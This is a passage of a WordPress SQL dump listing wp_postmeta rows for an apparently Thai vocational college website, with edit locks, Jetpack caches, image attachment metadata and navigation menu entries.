(2408, 727, '_publicize_pending', '1'),
(2409, 728, '_publicize_pending', '1'),
(2461, 740, '_edit_lock', '1522115686:3'),
(2462, 740, '_edit_last', '3'),
(2466, 740, '_hide_featured', NULL),
(2467, 740, '_wpas_done_all', '1'),
(2481, 744, 'cta_content_placement', 'below'),
(2482, 744, '_edit_lock', '1522115684:3'),
(2483, 744, '_edit_last', '3'),
(2487, 744, '_hide_featured', NULL),
(2488, 744, '_wpas_done_all', '1'),
(2489, 746, '_thumbnail_id', '303'),
(2490, 746, '_edit_lock', '1522116008:3'),
(2491, 746, '_edit_last', '3'),
(2495, 746, '_hide_featured', NULL),
(2496, 746, '_wpas_done_all', '1'),
(2505, 748, '_thumbnail_id', '332'),
(2506, 748, '_edit_lock', '1522115976:3'),
(2507, 748, '_edit_last', '3'),
(2511, 748, '_hide_featured', NULL),
(2512, 748, '_wpas_done_all', '1'),
(2513, 750, '_thumbnail_id', '344'),
(2514, 750, '_edit_lock', '1559892528:14'),
(2515, 750, '_edit_last', '3'),
(2519, 750, '_hide_featured', NULL),
(2520, 750, '_wpas_done_all', '1'),
(2521, 752, '_edit_lock', '1522115745:3'),
(2522, 752, '_edit_last', '3'),
(2526, 752, '_hide_featured', NULL),
(2527, 752, '_wpas_done_all', '1'),
(2532, 754, '_edit_lock', '1522116013:3'),
(2533, 754, '_edit_last', '3'),
(2537, 754, '_hide_featured', NULL),
(2538, 754, '_wpas_done_all', '1'),
(2539, 756, '_thumbnail_id', '703'),
(2540, 756, '_edit_lock', '1522115875:3'),
(2541, 756, '_edit_last', '3'),
(2545, 756, '_hide_featured', NULL),
(2546, 756, '_wpas_done_all', '1'),
(2547, 758, '_thumbnail_id', '704'),
(2548, 758, '_edit_lock', '1522115832:3'),
(2549, 758, '_edit_last', '3'),
(2553, 758, '_hide_featured', NULL),
(2554, 758, '_wpas_done_all', '1'),
(2559, 762, '_menu_item_type', 'taxonomy'),
(2560, 762, '_menu_item_menu_item_parent', '0'),
(2561, 762, '_menu_item_object_id', '3'),
(2562, 762, '_menu_item_object', 'category'),
(2563, 762, '_menu_item_target', ''),
(2564, 762, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2565, 762, '_menu_item_xfn', ''),
(2566, 762, '_menu_item_url', ''),
(2568, 763, '_menu_item_type', 'taxonomy'),
(2569, 763, '_menu_item_menu_item_parent', '0'),
(2570, 763, '_menu_item_object_id', '31'),
(2571, 763, '_menu_item_object', 'category'),
(2572, 763, '_menu_item_target', ''),
(2573, 763, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2574, 763, '_menu_item_xfn', ''),
(2575, 763, '_menu_item_url', ''),
(2577, 762, '_publicize_pending', '1'),
(2578, 763, '_publicize_pending', '1'),
(2591, 756, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575626161;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4967;}i:1;a:1:{s:2:\"id\";i:4958;}i:2;a:1:{s:2:\"id\";i:4685;}}}}'),
(2592, 758, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575632403;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4907;}i:1;a:1:{s:2:\"id\";i:5049;}i:2;a:1:{s:2:\"id\";i:5926;}}}}'),
(2593, 775, '_edit_lock', '1516869492:3'),
(2594, 775, '_edit_last', '3'),
(2598, 775, '_hide_featured', NULL),
(2599, 775, '_wpas_done_all', '1'),
(2602, 777, '_wp_attached_file', '2018/01/ปฏิทินการรับสมัคร-ปีการศึกษา-2561.jpg'),
(2603, 777, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1240;s:6:\"height\";i:1754;s:4:\"file\";s:99:\"2018/01/ปฏิทินการรับสมัคร-ปีการศึกษา-2561.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:99:\"ปฏิทินการรับสมัคร-ปีการศึกษา-2561-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:99:\"ปฏิทินการรับสมัคร-ปีการศึกษา-2561-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:100:\"ปฏิทินการรับสมัคร-ปีการศึกษา-2561-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:100:\"ปฏิทินการรับสมัคร-ปีการศึกษา-2561-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:99:\"ปฏิทินการรับสมัคร-ปีการศึกษา-2561-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2608, 775, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575640742;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4234;}i:1;a:1:{s:2:\"id\";i:5381;}i:2;a:1:{s:2:\"id\";i:4826;}}}}'),
(2611, 781, '_wp_attached_file', '2018/01/กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวช.1.jpg'),
(2612, 781, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1448;s:6:\"height\";i:2047;s:4:\"file\";s:133:\"2018/01/กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวช.1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:133:\"กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวช.1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:133:\"กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวช.1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:134:\"กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวช.1-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:134:\"กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวช.1-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:133:\"กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวช.1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2613, 782, '_wp_attached_file', '2018/01/กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวส.1.jpg'),
(2614, 782, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1448;s:6:\"height\";i:2047;s:4:\"file\";s:133:\"2018/01/กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวส.1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:133:\"กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวส.1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:133:\"กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวส.1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:134:\"กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวส.1-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:134:\"กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวส.1-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:133:\"กำหนดการปฐมนิเทศนักเรียน-นักศึกษาใหม่-ปวส.1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2615, 783, '_edit_lock', '1516697517:3'),
(2616, 783, '_edit_last', '3'),
(2620, 783, '_hide_featured', NULL),
(2621, 783, '_wpas_done_all', '1');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(2622, 783, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575553951;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4154;}i:1;a:1:{s:2:\"id\";i:4701;}i:2;a:1:{s:2:\"id\";i:3965;}}}}'),
(2627, 788, '_edit_lock', '1518336608:1'),
(2628, 788, '_edit_last', '1'),
(2633, 788, '_hide_featured', NULL),
(2634, 788, '_wpas_done_all', '1'),
(2635, 788, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575102435;s:7:\"payload\";a:2:{i:0;a:1:{s:2:\"id\";i:6040;}i:1;a:1:{s:2:\"id\";i:5936;}}}}'),
(2640, 794, '_edit_lock', '1518336692:1'),
(2641, 794, '_edit_last', '1'),
(2642, 794, '_hide_featured', NULL),
(2643, 794, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574939879;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4662;}i:1;a:1:{s:2:\"id\";i:4668;}i:2;a:1:{s:2:\"id\";i:4172;}}}}'),
(2647, 794, '_wpas_done_all', '1'),
(2648, 796, '_edit_lock', '1516860940:3'),
(2649, 796, '_edit_last', '3'),
(2650, 796, '_hide_featured', NULL),
(2651, 796, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575738650;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5589;}i:1;a:1:{s:2:\"id\";i:5680;}i:2;a:1:{s:2:\"id\";i:5952;}}}}'),
(2655, 796, '_wpas_done_all', '1'),
(2660, 799, '_wp_attached_file', '2018/01/27023423_533006667075526_6777013135087833409_o.jpg'),
(2661, 799, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1240;s:6:\"height\";i:1754;s:4:\"file\";s:58:\"2018/01/27023423_533006667075526_6777013135087833409_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"27023423_533006667075526_6777013135087833409_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"27023423_533006667075526_6777013135087833409_o-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"27023423_533006667075526_6777013135087833409_o-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"27023423_533006667075526_6777013135087833409_o-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"27023423_533006667075526_6777013135087833409_o-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2683, 806, '_edit_lock', '1521158587:1'),
(2684, 806, '_edit_last', '1'),
(2685, 807, '_wp_attached_file', '2018/01/27024291_535295693513290_2564198707510501767_o.jpg'),
(2686, 807, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2498;s:6:\"height\";i:656;s:4:\"file\";s:58:\"2018/01/27024291_535295693513290_2564198707510501767_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"27024291_535295693513290_2564198707510501767_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:57:\"27024291_535295693513290_2564198707510501767_o-300x79.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:79;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"27024291_535295693513290_2564198707510501767_o-768x202.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:202;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"27024291_535295693513290_2564198707510501767_o-1024x269.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"27024291_535295693513290_2564198707510501767_o-400x105.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:105;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2687, 806, '_hide_featured', NULL),
(2688, 806, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575741301;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5049;}i:1;a:1:{s:2:\"id\";i:5294;}i:2;a:1:{s:2:\"id\";i:5378;}}}}'),
(2692, 806, '_wpas_done_all', '1'),
(2695, 810, '_menu_item_type', 'custom'),
(2696, 810, '_menu_item_menu_item_parent', '0'),
(2697, 810, '_menu_item_object_id', '810'),
(2698, 810, '_menu_item_object', 'custom'),
(2699, 810, '_menu_item_target', ''),
(2700, 810, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2701, 810, '_menu_item_xfn', ''),
(2702, 810, '_menu_item_url', '#'),
(2704, 810, '_publicize_pending', '1'),
(2714, 812, '_menu_item_type', 'custom'),
(2715, 812, '_menu_item_menu_item_parent', '820'),
(2716, 812, '_menu_item_object_id', '812'),
(2717, 812, '_menu_item_object', 'custom'),
(2718, 812, '_menu_item_target', ''),
(2719, 812, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2720, 812, '_menu_item_xfn', ''),
(2721, 812, '_menu_item_url', '/งานบุคลากร'),
(2723, 813, '_menu_item_type', 'custom'),
(2724, 813, '_menu_item_menu_item_parent', '820'),
(2725, 813, '_menu_item_object_id', '813'),
(2726, 813, '_menu_item_object', 'custom'),
(2727, 813, '_menu_item_target', ''),
(2728, 813, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2729, 813, '_menu_item_xfn', ''),
(2730, 813, '_menu_item_url', '/งานหลักสูตร'),
(2732, 814, '_menu_item_type', 'custom'),
(2733, 814, '_menu_item_menu_item_parent', '820'),
(2734, 814, '_menu_item_object_id', '814'),
(2735, 814, '_menu_item_object', 'custom'),
(2736, 814, '_menu_item_target', ''),
(2737, 814, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2738, 814, '_menu_item_xfn', ''),
(2739, 814, '_menu_item_url', '/ข้อมูลนักเรียน-นักศึกษ-4'),
(2741, 815, '_menu_item_type', 'custom'),
(2742, 815, '_menu_item_menu_item_parent', '820'),
(2743, 815, '_menu_item_object_id', '815'),
(2744, 815, '_menu_item_object', 'custom'),
(2745, 815, '_menu_item_target', ''),
(2746, 815, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2747, 815, '_menu_item_xfn', ''),
(2748, 815, '_menu_item_url', '/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9E%E0%B8%B7%E0%B9%89%E0%B8%99%E0%B8%90%E0%B8%B2%E0%B8%99%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B1%E0%B8%94/'),
(2750, 816, '_menu_item_type', 'custom'),
(2751, 816, '_menu_item_menu_item_parent', '820'),
(2752, 816, '_menu_item_object_id', '816'),
(2753, 816, '_menu_item_object', 'custom'),
(2754, 816, '_menu_item_target', ''),
(2755, 816, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2756, 816, '_menu_item_xfn', ''),
(2757, 816, '_menu_item_url', '/งานแผน'),
(2759, 817, '_menu_item_type', 'custom'),
(2760, 817, '_menu_item_menu_item_parent', '820'),
(2761, 817, '_menu_item_object_id', '817'),
(2762, 817, '_menu_item_object', 'custom'),
(2763, 817, '_menu_item_target', ''),
(2764, 817, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2765, 817, '_menu_item_xfn', ''),
(2766, 817, '_menu_item_url', '/งานพัสดุ'),
(2768, 818, '_menu_item_type', 'custom'),
(2769, 818, '_menu_item_menu_item_parent', '820'),
(2770, 818, '_menu_item_object_id', '818'),
(2771, 818, '_menu_item_object', 'custom'),
(2772, 818, '_menu_item_target', ''),
(2773, 818, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2774, 818, '_menu_item_xfn', ''),
(2775, 818, '_menu_item_url', '/งานอาคารสถานที่'),
(2777, 819, '_menu_item_type', 'custom'),
(2778, 819, '_menu_item_menu_item_parent', '820'),
(2779, 819, '_menu_item_object_id', '819'),
(2780, 819, '_menu_item_object', 'custom'),
(2781, 819, '_menu_item_target', ''),
(2782, 819, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2783, 819, '_menu_item_xfn', ''),
(2784, 819, '_menu_item_url', '/?page_id=930&preview=true'),
(2786, 819, '_publicize_pending', '1'),
(2788, 814, '_publicize_pending', '1'),
(2789, 812, '_publicize_pending', '1'),
(2790, 816, '_publicize_pending', '1'),
(2791, 813, '_publicize_pending', '1'),
(2792, 817, '_publicize_pending', '1'),
(2793, 818, '_publicize_pending', '1'),
(2794, 815, '_publicize_pending', '1'),
(2795, 820, '_menu_item_type', 'custom'),
(2796, 820, '_menu_item_menu_item_parent', '810'),
(2797, 820, '_menu_item_object_id', '820'),
(2798, 820, '_menu_item_object', 'custom'),
(2799, 820, '_menu_item_target', ''),
(2800, 820, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2801, 820, '_menu_item_xfn', ''),
(2802, 820, '_menu_item_url', '#'),
(2804, 820, '_publicize_pending', '1'),
(2805, 821, '_edit_lock', '1636346541:14'),
(2806, 821, '_edit_last', '14'),
(2807, 822, '_wp_attached_file', '2018/01/GPP55-e1517214593488.jpg'),
(2808, 822, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1106;s:6:\"height\";i:700;s:4:\"file\";s:32:\"2018/01/GPP55-e1517214593488.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"GPP55-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"GPP55-300x190.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:190;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"GPP55-768x486.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"GPP55-1024x648.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:648;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:17:\"GPP55-400x253.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:253;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2815, 826, '_wp_attached_file', '2018/01/29-1-2561-15-06-39.jpg'),
(2816, 826, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:696;s:6:\"height\";i:632;s:4:\"file\";s:30:\"2018/01/29-1-2561-15-06-39.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"29-1-2561-15-06-39-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"29-1-2561-15-06-39-300x272.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"29-1-2561-15-06-39-330x300.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2817, 827, '_wp_attached_file', '2018/01/29-1-2561-15-09-24.jpg'),
(2818, 827, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:645;s:6:\"height\";i:271;s:4:\"file\";s:30:\"2018/01/29-1-2561-15-09-24.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"29-1-2561-15-09-24-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"29-1-2561-15-09-24-300x126.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:126;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"29-1-2561-15-09-24-400x168.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2819, 821, '_publicize_pending', '1'),
(2820, 821, '_hide_featured', NULL),
(2821, 822, '_wp_attachment_backup_sizes', 'a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1264;s:6:\"height\";i:800;s:4:\"file\";s:9:\"GPP55.jpg\";}}'),
(2822, 830, '_wp_attached_file', '2018/01/29-1-2561-15-44-46.jpg'),
(2823, 830, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1076;s:6:\"height\";i:707;s:4:\"file\";s:30:\"2018/01/29-1-2561-15-44-46.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"29-1-2561-15-44-46-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"29-1-2561-15-44-46-300x197.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:197;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"29-1-2561-15-44-46-768x505.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"29-1-2561-15-44-46-1024x673.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"29-1-2561-15-44-46-400x263.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:263;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2824, 831, '_wp_attached_file', '2018/01/29-1-2561-15-58-38.jpg'),
